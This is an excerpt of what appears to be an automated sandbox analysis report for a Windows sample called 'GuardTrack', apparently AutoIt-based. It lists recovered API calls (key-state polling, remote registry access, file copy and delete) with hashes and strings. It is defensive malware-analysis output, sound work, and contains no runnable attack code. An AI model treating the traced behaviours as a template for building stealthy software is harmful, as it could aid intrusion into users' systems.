                                                          • DeleteFileW.KERNEL32(?,?), ref: 00619AB6
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00619ACC
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00619ADD
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00619AEF
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: e4ea15ccac050c886f62f1852662b710fbc26e165d864e27e467a7dc93731f53
                                                          • Instruction ID: 1f446d76e6779797b42796f4cc153fee1058d177f85e9a8db72263aad90ec695
                                                          • Opcode Fuzzy Hash: e4ea15ccac050c886f62f1852662b710fbc26e165d864e27e467a7dc93731f53
                                                          • Instruction Fuzzy Hash: D0C140B1D00119AEDF21DF95CC95EDEBBBDEF85300F0440AAF609E6251EB709A848F65
                                                          APIs
                                                          • _memset.LIBCMT ref: 005C5BF1
                                                          • GetMenuItemCount.USER32(00677890), ref: 00600E7B
                                                          • GetMenuItemCount.USER32(00677890), ref: 00600F2B
                                                          • GetCursorPos.USER32(?), ref: 00600F6F
                                                          • SetForegroundWindow.USER32(00000000), ref: 00600F78
                                                          • TrackPopupMenuEx.USER32(00677890,00000000,?,00000000,00000000,00000000), ref: 00600F8B
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600F97
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: 022caa699ed72116214d9682ba277b1d74be0bea406011e5780fac387c529f3e
                                                          • Instruction ID: 59c04cd7be73dd01a64c909c436032cca3ba7db27c25b353484f0a7bc40d8653
                                                          • Opcode Fuzzy Hash: 022caa699ed72116214d9682ba277b1d74be0bea406011e5780fac387c529f3e
                                                          • Instruction Fuzzy Hash: 42710470684616BEFB248B94CC49FEBBF66FF04324F10421AF624662D0D7B06CA0DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,00640980), ref: 0061AF4E
                                                          • GetDriveTypeW.KERNEL32(00000061,0066B5F0,00000061), ref: 0061B018
                                                          • _wcscpy.LIBCMT ref: 0061B042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: L,d$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1864249466
                                                          • Opcode ID: 2a84ba67966365168eeeb4c0cb9fcbb40622bea0ae39079efcb29423e0bc88b9
                                                          • Instruction ID: e4d4199787451d6e533bce6616d81635ba9f124e6edfefa544586c8b26795f91
                                                          • Opcode Fuzzy Hash: 2a84ba67966365168eeeb4c0cb9fcbb40622bea0ae39079efcb29423e0bc88b9
                                                          • Instruction Fuzzy Hash: 4851C2701043069FC320EF54C895AEABBA6FF94300F54581EF496872E2DB30ED8ACA53
                                                          APIs
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • _memset.LIBCMT ref: 00608489
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006084BE
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006084DA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006084F6
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00608520
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00608548
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00608553
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00608558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: a3f36ecdb75824705723c50ef8378a7943221d10704437e764eb8a946992707d
                                                          • Instruction ID: 4fce5ca51031a9abf2f8451eadca165965fa525e7fce6a396005b5079bff1f83
                                                          • Opcode Fuzzy Hash: a3f36ecdb75824705723c50ef8378a7943221d10704437e764eb8a946992707d
                                                          • Instruction Fuzzy Hash: A3410976C1062DAFDF15EBE4DC55EEEBB79BF45740B004129F945A3291EA309D04CB90
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 422ef7048e0355051cb5d8947be27e1aa195c46f45359f169c75d257da1eaffa
                                                          • Instruction ID: 240ad75e9cc5b1db5316d46e64ed6e3c2769d40e8702336985644a6b245a2732
                                                          • Opcode Fuzzy Hash: 422ef7048e0355051cb5d8947be27e1aa195c46f45359f169c75d257da1eaffa
                                                          • Instruction Fuzzy Hash: AC41807050025ACBCF10EF94D854AEA3B66FFA2320F505416FC925B392DB31ED1ACBA1
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005FFB41,00000010,?,Bad directive syntax error,00640980,00000000,?,?,?), ref: 0060FF7D
                                                          • LoadStringW.USER32(00000000,?,005FFB41,00000010), ref: 0060FF84
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • _wprintf.LIBCMT ref: 0060FFB7
                                                          • __swprintf.LIBCMT ref: 0060FFD9
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00610048
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: 9f2bd84a7260e35532b16cf0e030523956d748607a97f5819abe470d54a0bad6
                                                          • Instruction ID: bdec0c6a99e24cae5f7a1fce5da5f0b10f99133628c5fb3ddfad158c4984912e
                                                          • Opcode Fuzzy Hash: 9f2bd84a7260e35532b16cf0e030523956d748607a97f5819abe470d54a0bad6
                                                          • Instruction Fuzzy Hash: 4221413184022EAFDF25EFD0CC1AFEE7B36BF59300F04045AF515621A2DA71AA68DB55
                                                          APIs
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                            • Part of subcall function 005C153B: _memmove.LIBCMT ref: 005C15C4
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006158EB
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00615901
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00615912
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00615924
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00615935
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: d516b6de807e5d2b9acdbec7bd760cc80ba9886f1ffd4aa749c6b0cdfbdcef58
                                                          • Instruction ID: 685e1848cf127b58977229980fcfbf01892bb2f3d27d93faffe1eeb6895d90c8
                                                          • Opcode Fuzzy Hash: d516b6de807e5d2b9acdbec7bd760cc80ba9886f1ffd4aa749c6b0cdfbdcef58
                                                          • Instruction Fuzzy Hash: 2B119331A4016AF9D710E7B1DC4AEFFAF7DFBD2B50F440829B405E21D1EA601984C9A1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 6c053cd8bc0a327c1512869d91954b85f55b13262a713f49e25a5be03ac88f0e
                                                          • Instruction ID: 25abc451c29b1437b5291fc09c937fe4a025957c23f608939a93b32214a3c1b8
                                                          • Opcode Fuzzy Hash: 6c053cd8bc0a327c1512869d91954b85f55b13262a713f49e25a5be03ac88f0e
                                                          • Instruction Fuzzy Hash: E0113A3150411AAFDB20B7649D4EEEA7BBEEF81710F080167F50497291EF7099C18AE0
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00615535
                                                            • Part of subcall function 005D083E: timeGetTime.WINMM(?,00000002,005BC22C), ref: 005D0842
                                                          • Sleep.KERNEL32(0000000A), ref: 00615561
                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00615585
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006155A7
                                                          • SetActiveWindow.USER32 ref: 006155C6
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006155D4
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 006155F3
                                                          • Sleep.KERNEL32(000000FA), ref: 006155FE
                                                          • IsWindow.USER32 ref: 0061560A
                                                          • EndDialog.USER32(00000000), ref: 0061561B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 7479a45ceb747f59c68cbb79830dca1a54ba5940403501ff1198f2dd671fce5d
                                                          • Instruction ID: a9782752d4b4dffeadbf4e527a747304910a0d09821f8c0632c2871e18b93517
                                                          • Opcode Fuzzy Hash: 7479a45ceb747f59c68cbb79830dca1a54ba5940403501ff1198f2dd671fce5d
                                                          • Instruction Fuzzy Hash: A3219F78644604EFF7845F70ED89AA57B6BEB85345F083018F50B822B1EF719DD09AB1
                                                          APIs
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • CoInitialize.OLE32(00000000), ref: 0061DC2D
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0061DCC0
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0061DCD4
                                                          • CoCreateInstance.OLE32(00643D4C,00000000,00000001,0066B86C,?), ref: 0061DD20
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0061DD8F
                                                          • CoTaskMemFree.OLE32(?,?), ref: 0061DDE7
                                                          • _memset.LIBCMT ref: 0061DE24
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0061DE60
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0061DE83
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0061DE8A
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0061DEC1
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0061DEC3
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 46f9a0c3ba27a13bf55f80f46a79609cf141b34023a3a35ee7fe1b7a60c31862
                                                          • Instruction ID: 6be8246a1d7af0cae3d17babefc87cde342697abcf32c34f7056a8c3456a8e22
                                                          • Opcode Fuzzy Hash: 46f9a0c3ba27a13bf55f80f46a79609cf141b34023a3a35ee7fe1b7a60c31862
                                                          • Instruction Fuzzy Hash: 40B1CA75A00119AFDB14DFA4C889DAEBBBAFF89304B148499E905EB351DB30ED45CF90
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00610896
                                                          • SetKeyboardState.USER32(?), ref: 00610901
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00610921
                                                          • GetKeyState.USER32(000000A0), ref: 00610938
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00610967
                                                          • GetKeyState.USER32(000000A1), ref: 00610978
                                                          • GetAsyncKeyState.USER32(00000011), ref: 006109A4
                                                          • GetKeyState.USER32(00000011), ref: 006109B2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 006109DB
                                                          • GetKeyState.USER32(00000012), ref: 006109E9
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00610A12
                                                          • GetKeyState.USER32(0000005B), ref: 00610A20
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: a72a062016a43dead661d4b1f6d9d7dfcf0b0d40c121e50cb3199219b408f5d0
                                                          • Instruction ID: 25050d656ac465d51f40b77b387c0e60510960812d54527f2255bfb444f1455a
                                                          • Opcode Fuzzy Hash: a72a062016a43dead661d4b1f6d9d7dfcf0b0d40c121e50cb3199219b408f5d0
                                                          • Instruction Fuzzy Hash: 8C51B924A0879829FF75DBA044107EABFB69F02780F0C459DD5C25B2C3DAA49ACCC795
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 0060CE1C
                                                          • GetWindowRect.USER32(00000000,?), ref: 0060CE2E
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0060CE8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 0060CE97
                                                          • GetWindowRect.USER32(00000000,?), ref: 0060CEA9
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0060CEFD
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0060CF0B
                                                          • GetWindowRect.USER32(00000000,?), ref: 0060CF1C
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0060CF5F
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0060CF6D
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0060CF8A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0060CF97
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 5f14eec586b9470d22c58462cd9541c87fa0666cd7c98ddd5a35c93b1149d345
                                                          • Instruction ID: d373330822152ad1cc8e68a0bdab826084903d3e8e4b09b8d36e949dccc17f82
                                                          • Opcode Fuzzy Hash: 5f14eec586b9470d22c58462cd9541c87fa0666cd7c98ddd5a35c93b1149d345
                                                          • Instruction Fuzzy Hash: F1515175B40205AFDB18CF68CD89AAEBBB7EB89710F14822DF616D72D0D770AD008B50
                                                          APIs
                                                            • Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC
                                                          • GetSysColor.USER32(0000000F), ref: 005B25AF
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 60432f521b554720fe86e3f9f5fc051386d4abfc5766c15c46d8f56467100ff3
                                                          • Instruction ID: 389560d5441b70d614d6dff2d06766eb0e6f35feadf1fa0c1914a40383b727ba
                                                          • Opcode Fuzzy Hash: 60432f521b554720fe86e3f9f5fc051386d4abfc5766c15c46d8f56467100ff3
                                                          • Instruction Fuzzy Hash: 9841A135004150ABDB255F689888BF93F66FB0A331F194265FEA68B1E5CB309C42DB31
                                                          APIs
                                                            • Part of subcall function 005D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005C2A3E,?,00008000), ref: 005D0BA7
                                                            • Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005C2ADF
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 005C2C2C
                                                            • Part of subcall function 005C3EBE: _wcscpy.LIBCMT ref: 005C3EF6
                                                            • Part of subcall function 005D386D: _iswctype.LIBCMT ref: 005D3875
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-3738523708
                                                          • Opcode ID: afc73be1d56cd1f4ad47a0f1a9b5f4943d786c82ee1f9a5ac31ae5bec1a5fc02
                                                          • Instruction ID: 02cf5f3fe20ebc27ba0a9395b744974728561541dedba86114e01fbc6210cbd3
                                                          • Opcode Fuzzy Hash: afc73be1d56cd1f4ad47a0f1a9b5f4943d786c82ee1f9a5ac31ae5bec1a5fc02
                                                          • Instruction Fuzzy Hash: 01027A301083469FC724EF64C855EAFBBE5BFD5314F04492EF59A932A2DB309A49CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
